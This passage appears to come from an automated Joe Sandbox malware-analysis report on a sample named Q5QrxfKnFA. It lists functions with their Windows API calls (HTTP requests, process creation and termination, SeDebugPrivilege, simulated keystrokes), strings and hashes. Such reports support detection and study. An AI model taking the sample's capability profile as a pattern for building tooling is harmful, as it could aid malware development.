                                                        • String ID: ,,=$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-1434771687
                                                        • Opcode ID: e43a972388c5097473c9c7e6eb3ca813e8af10b2d9726d57168383831118d4d6
                                                        • Instruction ID: 798e4cd7f962c8520993221db61e8b4b8d15652c12db27229424a761ea8fa032
                                                        • Opcode Fuzzy Hash: e43a972388c5097473c9c7e6eb3ca813e8af10b2d9726d57168383831118d4d6
                                                        • Instruction Fuzzy Hash: E0919131E00219ABDF26CFA5C848FEEBBB8EF45714F11855AF715AB680D7709940CBA0
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0039A439), ref: 0039A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 020269696cb43aec0efd8b5daaf4cecb5e5004d752ed3febd03666b0ed0d75c3
                                                        • Instruction ID: 07f0b68ce8287894ca591130f96b3d54b7c24f8a825259240fc0200ed506960c
                                                        • Opcode Fuzzy Hash: 020269696cb43aec0efd8b5daaf4cecb5e5004d752ed3febd03666b0ed0d75c3
                                                        • Instruction Fuzzy Hash: 7691DC31A00A05ABCF0ADFA0C482BEEF7B4FF04300F558619D999AB151DF316959DBD1
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00342EAE
                                                          • Part of subcall function 00341DB3: GetClientRect.USER32(?,?), ref: 00341DDC
                                                          • Part of subcall function 00341DB3: GetWindowRect.USER32(?,?), ref: 00341E1D
                                                          • Part of subcall function 00341DB3: ScreenToClient.USER32(?,?), ref: 00341E45
                                                        • GetDC.USER32 ref: 0037CD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037CD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0037CD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0037CD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 0037CD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037CDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 2ef8cb3185eeb1811fc3a47d0db025cf735c96a51c2cc229f32bb19a3887a791
                                                        • Instruction ID: 0221af811a786119a7463e76097216f0e1b82a47c5c8ce44678cd3910ecde29b
                                                        • Opcode Fuzzy Hash: 2ef8cb3185eeb1811fc3a47d0db025cf735c96a51c2cc229f32bb19a3887a791
                                                        • Instruction Fuzzy Hash: B771AE31400205DFCF339F64C884AAA7BB9FF48310F15926AFD59AA2A6D7359C91DF50
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B1A50
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003B1A7C
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003B1ABE
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003B1AD3
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1AE0
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003B1B10
                                                        • InternetCloseHandle.WININET(00000000), ref: 003B1B57
                                                          • Part of subcall function 003B2483: GetLastError.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B2498
                                                          • Part of subcall function 003B2483: SetEvent.KERNEL32(?,?,003B1817,00000000,00000000,00000001), ref: 003B24AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 23d043cba992f983dc4c258d3f1c3d356dfcc4956042b8bce81c99dd2e78a462
                                                        • Instruction ID: a4a34ef105e501ae5773a6214d96e9e054a0b6d00b182ea77a6bdfec85250619
                                                        • Opcode Fuzzy Hash: 23d043cba992f983dc4c258d3f1c3d356dfcc4956042b8bce81c99dd2e78a462
                                                        • Instruction Fuzzy Hash: D8414DB1501219BFEB139F50CC99FFB7BADEF08358F00412AFA059A541E774AE449BA0
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003CF910), ref: 003B8D28
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003CF910), ref: 003B8D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003B8ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 003B8F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 8f4ebdf74c55a8732c66954c8095178c25c08231149ece2d9f91fe89ed2fdf9e
                                                        • Instruction ID: b23eb544ad94820b923d08d7eca3585479d68ae775ab5dc144f87692344c387b
                                                        • Opcode Fuzzy Hash: 8f4ebdf74c55a8732c66954c8095178c25c08231149ece2d9f91fe89ed2fdf9e
                                                        • Instruction Fuzzy Hash: 36F12971A00209AFCF15EF94C884EEEB7B9FF45318F118459FA05AB651DB31AE46CB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 003BF6B5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF848
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF86C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF8AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF8CE
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BFA4A
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003BFA7C
                                                        • CloseHandle.KERNEL32(?), ref: 003BFAAB
                                                        • CloseHandle.KERNEL32(?), ref: 003BFB22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 8839d0c842efe23c6837b88b71fa8e552e86993cceb32f37f97d5c131b612ec4
                                                        • Instruction ID: 21b2f44802acf69b1498bdbe576dbe430373731d82a19ce56c533b7a91b4d4db
                                                        • Opcode Fuzzy Hash: 8839d0c842efe23c6837b88b71fa8e552e86993cceb32f37f97d5c131b612ec4
                                                        • Instruction Fuzzy Hash: A6E1B0316042009FC716EF24C881BABBBE5EF85354F14896DF9898F6A2CB31EC45CB52
                                                        APIs
                                                          • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A3697,?), ref: 003A468B
                                                          • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A3697,?), ref: 003A46A4
                                                          • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003A4D40
                                                        • _wcscmp.LIBCMT ref: 003A4D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 003A4D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 001e1bf4c21efc4a5ed4c10b0cc7b2cee662c904b21ffe588e41ad7e7665caba
                                                        • Instruction ID: 066db907b4a049e6b9965aef3b795f04260a724be72ef9d53b715bfda007ad78
                                                        • Opcode Fuzzy Hash: 001e1bf4c21efc4a5ed4c10b0cc7b2cee662c904b21ffe588e41ad7e7665caba
                                                        • Instruction Fuzzy Hash: F15142B24083459BC726DBA4D8819DFB3ECEF85350F00492EB689D7152EF74A588C766
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C86FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: d9c336331cc541fb5a09b59166bb8e598e72f72f4e39956e69e661631b75921b
                                                        • Instruction ID: 138a0bf4eae0496724fbb0b30a5a08715e4e853e7bb5f33ea3fb1b2de587047a
                                                        • Opcode Fuzzy Hash: d9c336331cc541fb5a09b59166bb8e598e72f72f4e39956e69e661631b75921b
                                                        • Instruction Fuzzy Hash: 9451B430500244BEEF229F24DC89FAD7BA9EB05354F604129FA55EA5E1DF71AF90CB50
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037C2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037C319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037C331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037C34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037C370
                                                        • DestroyIcon.USER32(00000000), ref: 0037C37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037C39C
                                                        • DestroyIcon.USER32(?), ref: 0037C3AB
                                                          • Part of subcall function 003CA4AF: DeleteObject.GDI32(00000000), ref: 003CA4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: 8eae9e03a64244dd1420a4c54238fbe9467afcb725071159542003b2da885d2b
                                                        • Instruction ID: ade7a3a8ba4f054f1c346ed12cdcd494993c424a91d54bebbeaac32fae347e2d
                                                        • Opcode Fuzzy Hash: 8eae9e03a64244dd1420a4c54238fbe9467afcb725071159542003b2da885d2b
                                                        • Instruction Fuzzy Hash: 7E517974610609AFDB26DF64CC45FAB3BE9EB48310F108528F906EB690DB74AC90DB50
                                                        APIs
                                                          • Part of subcall function 0039A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A84C
                                                          • Part of subcall function 0039A82C: GetCurrentThreadId.KERNEL32 ref: 0039A853
                                                          • Part of subcall function 0039A82C: AttachThreadInput.USER32(00000000,?,00399683,?,00000001), ref: 0039A85A
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0039968E
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003996AB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003996AE
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003996B7
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003996D5
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003996D8
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003996E1
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003996F8
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003996FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: d13ff05b74cb0929c2b1d5aaf21dc4c67b145bc5702b1f378da925339d7f741f
                                                        • Instruction ID: d98b9d8387680f67b0c8184e557c781eccd922c245372264010a9e1db2b7f416
                                                        • Opcode Fuzzy Hash: d13ff05b74cb0929c2b1d5aaf21dc4c67b145bc5702b1f378da925339d7f741f
                                                        • Instruction Fuzzy Hash: C411E571910618BEFA116F64DC49F6A7F1EDB4C7A0F110426F644EB0A0C9F36C10DBA4
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0039853C,00000B00,?,?), ref: 0039892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 00398931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0039853C,00000B00,?,?), ref: 00398946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0039853C,00000B00,?,?), ref: 0039894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 00398951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0039853C,00000B00,?,?), ref: 00398961
                                                        • GetCurrentProcess.KERNEL32(0039853C,00000000,?,0039853C,00000B00,?,?), ref: 00398969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0039853C,00000B00,?,?), ref: 0039896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00398992,00000000,00000000,00000000), ref: 00398986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 034178ec0add21d3795b2578758f94fa96d73fb49c28f931d2ba2cf3f24a9dd6
                                                        • Instruction ID: 851cd210e0dd647218f7a7b8beb83b1870f77d049a1ea7b617cf5c20434be439
                                                        • Opcode Fuzzy Hash: 034178ec0add21d3795b2578758f94fa96d73fb49c28f931d2ba2cf3f24a9dd6
                                                        • Instruction Fuzzy Hash: 8B01BBB5240308FFE711ABA5DC4DF6B7BADEB89711F448421FA05DB1A1CA71AC00CB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 2a1d8576ade5a6aa81dac44fab388d4ddc9fceef978289eaf2c35457c17eb7de
                                                        • Instruction ID: 1c024927c8ed11a1bf86b45d717d40a5aea64f677e4ca4cd68e93801e4857db9
                                                        • Opcode Fuzzy Hash: 2a1d8576ade5a6aa81dac44fab388d4ddc9fceef978289eaf2c35457c17eb7de
                                                        • Instruction Fuzzy Hash: FEC19171A002199FDF11DF59D884BEEB7F9AB48318F15846AEB05AB681E770ED40CB90
                                                        APIs
                                                          • Part of subcall function 0039710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?,?,00397455), ref: 00397127
                                                          • Part of subcall function 0039710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397142
                                                          • Part of subcall function 0039710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397150
                                                          • Part of subcall function 0039710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?), ref: 00397160
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003B9806
                                                        • _memset.LIBCMT ref: 003B9813
                                                        • _memset.LIBCMT ref: 003B9956
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003B9982
                                                        • CoTaskMemFree.OLE32(?), ref: 003B998D
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 003B99DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: ffbe5e7b7b30800ebb7b72485a0fc9c22648a8294ae901fad6c5a712beb4563f
                                                        • Instruction ID: bfc0f7e8c2a373f0233293b2a665d716dbc4c844936917b0f669a89b05e91b1a
                                                        • Opcode Fuzzy Hash: ffbe5e7b7b30800ebb7b72485a0fc9c22648a8294ae901fad6c5a712beb4563f
                                                        • Instruction Fuzzy Hash: 3F914A71D00228EBDB12DFA5DC41EDEBBB9EF08714F10415AF619AB291DB716A44CFA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C6E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 003C6E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C6E52
                                                        • _wcscat.LIBCMT ref: 003C6EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C6EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C6EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: cef7f1fa037530a91df6903c7403c0dcc2876a200b1e6ea12f012a743147bafb
                                                        • Instruction ID: 65bd245b03065eaffcb2e3f40e658f98ee270559023286ff572d3836e5f1fa4c
                                                        • Opcode Fuzzy Hash: cef7f1fa037530a91df6903c7403c0dcc2876a200b1e6ea12f012a743147bafb
                                                        • Instruction Fuzzy Hash: E2418175A00348AFDB229F64CC86FEE77E9EF08350F11442EF545E7291D6729D848B60
                                                        APIs
                                                          • Part of subcall function 003A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003A3C7A
                                                          • Part of subcall function 003A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003A3C88
                                                          • Part of subcall function 003A3C55: CloseHandle.KERNEL32(00000000), ref: 003A3D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BE9A4
                                                        • GetLastError.KERNEL32 ref: 003BE9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BE9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BEA63
                                                        • GetLastError.KERNEL32(00000000), ref: 003BEA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 003BEAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 036a273c620e56d8e32156473674f6a83e9ff9b9fbacd77fba88ff930c8ee019
